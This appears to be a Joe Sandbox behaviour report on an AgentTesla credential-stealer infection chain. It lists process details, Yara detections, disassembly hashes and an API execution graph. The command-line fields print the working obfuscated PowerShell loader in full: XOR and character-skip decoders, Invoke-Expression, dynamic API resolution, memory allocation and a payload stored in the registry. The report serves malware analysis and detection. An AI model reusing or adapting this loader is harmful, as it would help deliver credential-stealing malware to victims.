Bi'PoFCeEElFag6EkDDiCRaDCo6TeDAl1OvCvi0MeCRe8Sk8UdBAlFEl7FoDBl0CoCAaBAnDTr1PrCTrCFoCHe8TiCHu0or8UnBHrEstCKeCCyBTeDBo1VrCIn0meDPu7AiCItAPrDTu5RuFBe6FuCDe0FlDAn7OuDSl3LeCMaCPiCDi6DiCSo0UnDBo6Ve8syBBrEMe8EpCZo4StDSe7SaDSl6PeCElDDeCEl4HeCMe9KoFPr8Op9unFWo9GlFBlENu6FoCPaASpDma5ToDRuCSt8FlDAu8Pa1GaEOuDcuCEkACaCBu0IvDLi7KrCEl0GeDAb6Va8Is9Fa8Pa5Ko9To5Pa8Ol9Hy8Sm5Se8Ta5Fu8Be1DrFFu6MdDOv0klCUnEDiCUnEArCLi0PlDTe7trCGiASlDBa3AgCSt0puDAr7SeDCe1baDPy7prCKlEfeCJuEElCRd0TaDBa1GiDUd6Af9dr6Pe8Fe9Ja8af5Ga9Ka6as9Im0Po9AnCPa8MaCOr'in;Tr&An(Ud`$GaGWhhFleFlgReiOpsSchSa7Ov)sp En`$PrCPraBerRetSuwLerSmiUngPrhHatUniDinIjgSt0Ov;pr`$NeNMaoSonOscStoStnCrdGoiEnmEneblnSytGo2De=Ub`$LiHUloTreDirSaeFosUn.WecFioLauAnnOutMa-pi3Sm5Re9Ur;Sk`$paCBeaTorFotExwSirYaiSngmihGatKoiBankngTr1Em Ba=Bu UnSMomSgeSurRetRueFanCasTwbAmaFrrGanSusBi0St ar'AuFKoELoFev6AsDHyCNoDNa6UdDNi1BaCSt0WiCMu8Ve8ClBmuFPy7UnDBu0HyCemBStDPe1GrCopCpaCCa8CaCSc0Re8LsBHuESaCWoCPlBDiDHa1CoCpa0HiDMy7NoCSpApaDUt5CaFBo6DiCAn0MaDDe7SeDFi3UnCreCHuCBi6sqCPl0MoDhi6Ou8BuBSaESe8ThCPr4ViDKu7SnDCy6BeCNoDLaCCh4MiCFe9NiFPa8An9TaFPo9KaFReEFo6SeCWhADoDOu5NoDHoCPe8ReDTr8Sp1DrEvaDNeCbyAFoCCa0spDAs7GiCSp0UnDTo6Sk8fj9Sa8In5Ge9Sa6Fe9Ur0Th9ThCDk8cu9Co8Ba5Ov8Su1LoEDe6ruCOrApiDkl7CoDDe7SuCbuACiCHy7afCHi7GaCLuAEkDTu7UnCPi0PrCEk0Pa8Pi9Un8La5st8ud1SkEAnBChCEnASkCDoBTmCVa6ViCTeAJuCFaBVaCSt1KaCunCKiCaf8MoCMa0SeCMeBPlDSh1Et9be7In8RoCHa'Vo;Mo&Br(Tr`$FlGRehReeAigFeiTesgahPh7Wh)Fo Sh`$TeCcoaInrRetUdwForEfistgYahIbtspiUdnFagSo1St;Ed`$FrCPraNorSmtPewStrKliBdgKohCotEniPonFigAn2ba St=do stSPrmUneimrRetAdeClnStsKobBuadirDinHosDi0Tr to'Su8Br1AnCRoEfjCNo9VuCSa4MiDZo7StCFl2UkCWeFPrCSkAStDSl7WiCUn1BoCMi0Br8Bn5He9Sk8Vi8Ka5BaFInEBlFAj6InDDoCudDCi6AnDSl1InCSt0InCSy8Le8AyBTiFce7AsDNo0DeCImBAlDNo1NiCBiCSlCTi8VoCSe0Fu8ReBGaEnoCDeCOmBChDMe1TeCMa0BaDus7KeCPeAWaDFe5clFFo6BuCLa0ReDDe7NoDJe3StCHyCAlCSt6SkCDi0BeDMe6bl8AnBkoEEt8AfCAc4TiDBa7DrDSt6AhCSkDGiCLi4NoCFu9AsFSp8uj9ReFDi9RoFSuEBa2ApCKo0unDGr1HiEFi1GrCGu0diCPe9KoCJa0DeCFr2ReCUn4phDmu1DaCEp0MiEDe3ubCJoAReDbl7vaEma3SkDBa0ToCPsBSkCTy6reDPo1GhCDeCMaCTeASkCTiBUdFFo5UnCWeAEuCHoCLaCTrBAnDEr1AlCMa0ThDCh7Hi8coDfo8un1GeFTr6KeDAd0PaCPeESkCBoEhaCEk0noDRe7AeCPeAMoDGu3UnCTe0DiDim7RaDCa1HeDud7PeCTiEInCCoESiCMo0NoDSh1JoDBu6Oo9Vi6Ha8Cr9Ro8An5Tu8UvDinEKo2VuEAr1ouFLe1De8Co5PlESy5Se8CaDtaFDyEFdERvCBaCPhBBgDTo1PuFKa5UnDla1UlDJo7ToFSu8An8Sv9UnFSpEMeEDeCRaCAfBKoDAp1AfFVe5beDUn1UnDAl7DsFSc8Du8CoCLo8Ca5Kv8SnDFrFCuEElFQu3HeCPaAPrCRoCTrCIn1HaFTa8Ma8BiCIt8GuCOv8AbCMu'He;Re&St(Gr`$SpGSihBeePrgSpiFasTehJu7Ga)Gr Un`$ChCtralerHotRewUnrTeibigUnhEstSkiNonStgGa2gu;Ma`$BiCPiaUnrUntOuwAdrUniUngElhTitDiiStnMogDa3Fl Br=Li TiSCemSaeAsrBotmaeRenDesgebkyaMorFlnStsHj0Sy Mo'Gr8Wi1saCReEfiCTy9TuCTi4TiDpe7riCDm2TeCOpFMaCFrAKrDSe7GrCKr1CiCIn0Le8BaBTaEMiCcoCKrBKeDFa3DiCBrAkaCTrEBrCFu0Hj8DiDAp8Go1LoEje6ReCOmAVeDKn7FoDBo7ReCGbAOnCDe7SlCOp7HaCRaAFeDQu7PsCMe0GrCmy0Sk8Si9Ko8Et1MaEac1NoCPl8BlCBrBTbCGaCFoCVrBCoCUn2BiDPs6HeDBr5ZoDAc7WhCChACoCSpFLsCGh0BjCUsECoDLa1stCma0inDSp7Gl8SaCMa'Di;Ph&Bi(Al`$DeGAmhGreGigSkiAmsFohSa7Me)Mo To`$FaCShaMarSvtFlwDirKliBrgMahcitnaiTrnFogSu3Ta#Ga;""";;Function Cartwrighting9 { param([String]$Regionsplanlovs); For($Klistringer=2; $Klistringer -lt $Regionsplanlovs.Length-1; $Klistringer+=(2+1)){ $Smertensbarns = $Smertensbarns + $Regionsplanlovs.Substring($Klistringer, 1); } $Smertensbarns;}$talose0 = Cartwrighting9 'CeIFoEReXPr ';$talose1= Cartwrighting9 $Vildmnd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $talose1 ;}else{.$talose0 $talose1;}
                                        Imagebase:0x7ff7287a0000
                                        File size:452608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:moderate

                                        General

                                        Target ID:3
                                        Start time:15:50:34
                                        Start date:01/12/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7b44d0000
                                        File size:875008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:4
                                        Start time:15:50:36
                                        Start date:01/12/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C38D8DEBC0D288EAC7CFC0C6D185ECCBD1F5D1D78C89858D81EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6908C8C8BECCBD3CACEC08D81CBD0C9C98985E58D81F0D5C2D7CAD2CB8C8C8C8C898581E1C0D5D7C0D6D6CCCACBD6D5C0D7CCCAC1C0D78C8C';&($Ghegish7) $Hoeres1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Nondecorously,[Parameter(Position = 1)] [Type] $Coeliomyalgia = [Void]);$Hoeres2 = Smertensbarns0 '81EDC4DCCBC0D6859885FEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE1C0C3CCCBC0E1DCCBC4C8CCC6E4D6D6C0C8C7C9DC8D8DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE4D6D6C0C8C7C9DCEBC4C8C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69D8C8C8985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE0C8CCD18BE4D6D6C0C8C7C9DCE7D0CCC9C1C0D7E4C6C6C0D6D6F89F9FF7D0CB8C8BE1C0C3CCCBC0E1DCCBC4C8CCC6E8CAC1D0C9C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69C898581C3C4C9D6C08C8BE1C0C3CCCBC0F1DCD5C08D81E2CDC0C2CCD6CD95898581E2CDC0C2CCD6CD948985FEF6DCD6D1C0C88BE8D0C9D1CCC6C4D6D1E1C0C9C0C2C4D1C0F88C';&($Ghegish7) $Hoeres2;$Hoeres3 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E6CACBD6D1D7D0C6D1CAD78D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6938985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE6C4C9C9CCCBC2E6CACBD3C0CBD1CCCACBD6F89F9FF6D1C4CBC1C4D7C1898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres3;$Hoeres4 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E8C0D1CDCAC18D81E2CDC0C2CCD6CD97898581E2CDC0C2CCD6CD96898581E6CAC0C9CCCAC8DCC4C9C2CCC4898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres4;$Hoeres5 = Smertensbarns0 'D7C0D1D0D7CB8581EDC4DCCBC0D68BE6D7C0C4D1C0F1DCD5C08D8C';&($Ghegish7) $Hoeres5 ;}$Uncouple = Smertensbarns0 'CEC0D7CBC0C99697';$Hoeres6 = Smertensbarns0 '81F2C0D7C0D7C4D1859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D8DC3CED58581F0CBC6CAD0D5C9C08581E2CDC0C2CCD6CD918C89858DE2E1F185E58DFEECCBD1F5D1D7F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88C858DFEECCBD1F5D1D7F88C8C8C';&($Ghegish7) $Hoeres6;$Dmningsprojekter = fkp $Ghegish5 $Ghegish6;$Hoeres7 = Smertensbarns0 '81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69685988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898596909C898595DD96959595898595DD91958C';&($Ghegish7) $Hoeres7;$Hoeres8 = Smertensbarns0 '81E6CAD7D7CAC7C7CAD7C0C085988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898595DD949595959595898595DD96959595898595DD918C';&($Ghegish7) $Hoeres8;$Cartwrighting=(Get-ItemProperty -Path 'HKCU:\Pseudambulacrum\konstitutionel').Bjfs;$Hoeres9 = Smertensbarns0 '81EDCAC0D7C0D6859885FEF6DCD6D1C0C88BE6CACBD3C0D7D1F89F9FE3D7CAC8E7C4D6C09391F6D1D7CCCBC28D81E6C4D7D1D2D7CCC2CDD1CCCBC28C';&($Ghegish7) $Hoeres9;$Cartwrighting0 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D689859589858581F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D696898596909C8C';&($Ghegish7) $Cartwrighting0;$Noncondiment2=$Hoeres.count-359;$Cartwrighting1 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D6898596909C898581E6CAD7D7CAC7C7CAD7C0C0898581EBCACBC6CACBC1CCC8C0CBD1978C';&($Ghegish7) $Cartwrighting1;$Cartwrighting2 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C0859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69689858DE2E1F185E58DFEECCBD1F5D1D7F889FEECCBD1F5D1D7F88C858DFEF3CACCC1F88C8C8C';&($Ghegish7) $Cartwrighting2;$Cartwrighting3 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C08BECCBD3CACEC08D81E6CAD7D7CAC7C7CAD7C0C08981E1C8CBCCCBC2D6D5D7CACFC0CED1C0D78C';&($Ghegish7) $Cartwrighting3#
                                        Imagebase:
                                        File size:433152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Target ID:7
                                        Start time:15:50:54
                                        Start date:01/12/2022
                                        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                        Imagebase:0x9b0000
                                        File size:106496 bytes
                                        MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 00007FF825BB5090 Relevance: .3, Instructions: 301COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dfeb2281a58f1676ac446661899e0cef63c31899c8e100011af1ece54d9b474d
                                          • Instruction ID: 90f75531c161095d29df3128abf72c3ef8082d4e027e69578b4650c147b55aae
                                          • Opcode Fuzzy Hash: dfeb2281a58f1676ac446661899e0cef63c31899c8e100011af1ece54d9b474d
                                          • Instruction Fuzzy Hash: 3D91123091D7864FE706EB2898915E57FA0EF92760B0400BED089CF1A3EA69BC46C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF825BB5118 Relevance: .1, Instructions: 148COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46fed6240746d391d63a39ca372d936b7dab7333190b05b093899f26ca61cc7e
                                          • Instruction ID: b78686e8906c7eedb29bf35bc0a72833ffb80b98158f150b00b77cbd1ef7fd47
                                          • Opcode Fuzzy Hash: 46fed6240746d391d63a39ca372d936b7dab7333190b05b093899f26ca61cc7e
                                          • Instruction Fuzzy Hash: CF41C47061CB498FD788DE1CC8859B5B7E2FBA9750B10057DE48AC7296EB62FC42C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF825BB3BF7 Relevance: .1, Instructions: 116COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29eae0b6ff33b2d49d93290626b011dead1b4a4b84965552eb33d6b691e7f92d
                                          • Instruction ID: a3ee4c7a8e695fd8f689289362083a56c8fb814e8cb6208e3ab033078384054d
                                          • Opcode Fuzzy Hash: 29eae0b6ff33b2d49d93290626b011dead1b4a4b84965552eb33d6b691e7f92d
                                          • Instruction Fuzzy Hash: DF316D31A189098FDF98EF5CD895AAC77E1FF68750F140169D409DB296CE64FC82C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF825BB3535 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24ba00a0b3ed904ba1423c6eb5ec5aacd20f0bfb85cc6ccb291ea0c276a7c962
                                          • Instruction ID: 6aa5b52b2c6c46326aa4c6c4cca71307c1edb08f70fee337a4c4ae0acbabe46f
                                          • Opcode Fuzzy Hash: 24ba00a0b3ed904ba1423c6eb5ec5aacd20f0bfb85cc6ccb291ea0c276a7c962
                                          • Instruction Fuzzy Hash: 0F01847011CB0C4FD748EF0CE451AA5B3E0FB95320F10056DE58AC3251DB22E881CB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF825BB524F Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21cb1261c9de1ffd8c3752d3c465dcbff27f4ae43a5a0a91bbdb9a8433cfa56a
                                          • Instruction ID: f228f43ff645f6517a1c8cc1ff04dadb2fa567ac15715184267ba44560cb0d7d
                                          • Opcode Fuzzy Hash: 21cb1261c9de1ffd8c3752d3c465dcbff27f4ae43a5a0a91bbdb9a8433cfa56a
                                          • Instruction Fuzzy Hash: 46F0547175CB448FDB9CDA1CE84197977D1EBD9330F10062EF08BC66D6DA26F8428646
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:28.9%
                                          Dynamic/Decrypted Code Coverage:99.9%
                                          Signature Coverage:2.9%
                                          Total number of Nodes:727
                                          Total number of Limit Nodes:21
                                          execution_graph 41350 1d45a346 41351 1d45a3b1 41350->41351 41352 1d45a372 FindCloseChangeNotification 41350->41352 41351->41352 41353 1d45a380 41352->41353 41354 1fe31366 41355 1fe313b6 RegEnumKeyExW 41354->41355 41356 1fe313c4 41355->41356 41361 1fe3256a 41362 1fe3259f ioctlsocket 41361->41362 41364 1fe325cb 41362->41364 41365 1fe338ea 41366 1fe33910 FindWindowW 41365->41366 41368 1fe3393e 41366->41368 41369 1fe335ee 41371 1fe33623 GetAdaptersAddresses 41369->41371 41372 1fe3365c 41371->41372 41373 1fe3056e 41375 1fe305a6 CreateFileW 41373->41375 41376 1fe305f5 41375->41376 41377 1fe3096e 41379 1fe309a3 ReadFile 41377->41379 41380 1fe309d5 41379->41380 41381 1d45a54a 41384 1d45a582 RegOpenKeyExW 41381->41384 41383 1d45a5d8 41384->41383 41385 1d45a652 41387 1d45a687 RegQueryValueExW 41385->41387 41388 1d45a6db 41387->41388 41389 dac146 TerminateThread 41390 1fe3247e 41393 1fe324b3 GetProcessTimes 41390->41393 41392 1fe324e5 41393->41392 41394 1d45afda 41395 1d45b00f NtQuerySystemInformation 41394->41395 41396 1d45b03a 41394->41396 41397 1d45b024 41395->41397 41396->41395 41398 1fe336c2 41401 1fe336f7 WSAConnect 41398->41401 41400 1fe33716 41401->41400 41410 1fe32646 41412 1fe3267b WSAIoctl 41410->41412 41413 1fe326c9 41412->41413 41414 1fe3194a 41416 1fe31982 WSASocketW 41414->41416 41417 1fe319be 41416->41417 41421 1fe330ce 41422 1fe33103 GetNetworkParams 41421->41422 41424 1fe33133 41422->41424 41425 1fe31a4e 41426 1fe31a86 setsockopt 41425->41426 41427 1fe31abe 41425->41427 41428 1fe31a94 41426->41428 41427->41426 41429 1fe31d52 41430 1fe31d8a ConvertStringSecurityDescriptorToSecurityDescriptorW 41429->41430 41432 1fe31dcb 41430->41432 41433 1fe329d6 41435 1fe32a0e RegOpenCurrentUser 41433->41435 41436 1fe32a41 41435->41436 41437 1fe32bda 41438 1fe32c0f RegNotifyChangeKeyValue 41437->41438 41440 1fe32c4c 41438->41440 41441 1fe307de 41444 1fe30813 GetFileType 41441->41444 41443 1fe30840 41444->41443 41449 1fe322a6 41452 1fe322de CreateMutexW 41449->41452 41451 1fe32321 41452->41451 41453 1fe32826 41454 1fe3285b WSAEventSelect 41453->41454 41456 1fe32892 41454->41456 41457 1fe323ae 41458 1fe323e3 shutdown 41457->41458 41460 1fe3240c 41458->41460 41461 1d45b50a 41462 1d45b536 OleInitialize 41461->41462 41463 1d45b56c 41461->41463 41464 1d45b544 41462->41464 41463->41462 41465 1d45b396 41466 1d45b3e6 MkParseDisplayName 41465->41466 41467 1d45b3f4 41466->41467 41468 1d45ae12 41470 1d45ae47 K32GetModuleInformation 41468->41470 41471 1d45ae7e 41470->41471 41472 1d45a09a 41473 1d45a0cf send 41472->41473 41475 1d45a107 41472->41475 41474 1d45a0dd 41473->41474 41475->41473 41476 1d45a89a 41479 1d45a8c3 LookupPrivilegeValueW 41476->41479 41478 1d45a8ea 41479->41478 41480 1fe31f02 41482 1fe31f3a OpenFileMappingW 41480->41482 41483 1fe31f75 41482->41483 41484 1fe32002 41485 1fe3203a MapViewOfFile 41484->41485 41487 1fe32089 41485->41487 41488 1fe31606 41489 1fe31632 GlobalMemoryStatusEx 41488->41489 41490 1fe31671 41488->41490 41491 1fe31640 41489->41491 41490->41489 41492 1fe3378a 41493 1fe33800 41492->41493 41494 1fe337c8 DuplicateHandle 41492->41494 41493->41494 41495 1fe337d6 41494->41495 41496 1fe3290a 41498 1fe3293f RasConnectionNotificationW 41496->41498 41499 1fe32972 41498->41499 41500 1fe3188a 41501 1fe318da RasEnumConnectionsW 41500->41501 41502 1fe318e8 41501->41502 41503 1fe3340e 41505 1fe33449 getaddrinfo 41503->41505 41506 1fe334bb 41505->41506 41507 1d45ad2a 41509 1d45ad5f K32EnumProcessModules 41507->41509 41510 1d45ad8e 41509->41510 41511 1f820070 41512 1f82007d 41511->41512 41513 1f82008f 41512->41513 41515 1f821518 41512->41515 41516 1f821526 41515->41516 41517 1f821549 41515->41517 41516->41513 41518 1f82186e 41517->41518 41520 1f821cc8 41517->41520 41518->41513 41521 1f821cd1 41520->41521 41522 1f821cfa 41521->41522 41548 1f822b4a 41521->41548 41578 1f822f40 41521->41578 41588 1f822d3c 41521->41588 41613 1f823033 41521->41613 41623 1f822aab 41521->41623 41653 1f822a27 41521->41653 41683 1f822ca6 41521->41683 41708 1f822ea1 41521->41708 41726 1f822b9e 41521->41726 41756 1f822f94 41521->41756 41766 1f822e14 41521->41766 41791 1f821d90 41521->41791 41798 1f823087 41521->41798 41805 1f821d80 41521->41805 41812 1f822aff 41521->41812 41842 1f822d7e 41521->41842 41867 1f822cf1 41521->41867 41892 1f822bf2 41521->41892 41919 1f822eec 41521->41919 41933 1f822fdf 41521->41933 41943 1f822e5f 41521->41943 41965 1f8230db 41521->41965 41969 1f822a57 41521->41969 41999 1f822c52 41521->41999 42024 1f822dc9 41521->42024 41522->41517 41549 1f822b5b 41548->41549 42049 1f827682 41549->42049 42054 1f8276e0 41549->42054 41550 1f822bc8 KiUserExceptionDispatcher 41552 1f822c28 41550->41552 41553 1f822e3e 41552->41553 42058 cd79e0 41552->42058 42064 cd774f 41552->42064 41554 1f822e80 41553->41554 41569 cd774f 11 API calls 41553->41569 41570 cd79e0 11 API calls 41553->41570 42071 cd7c30 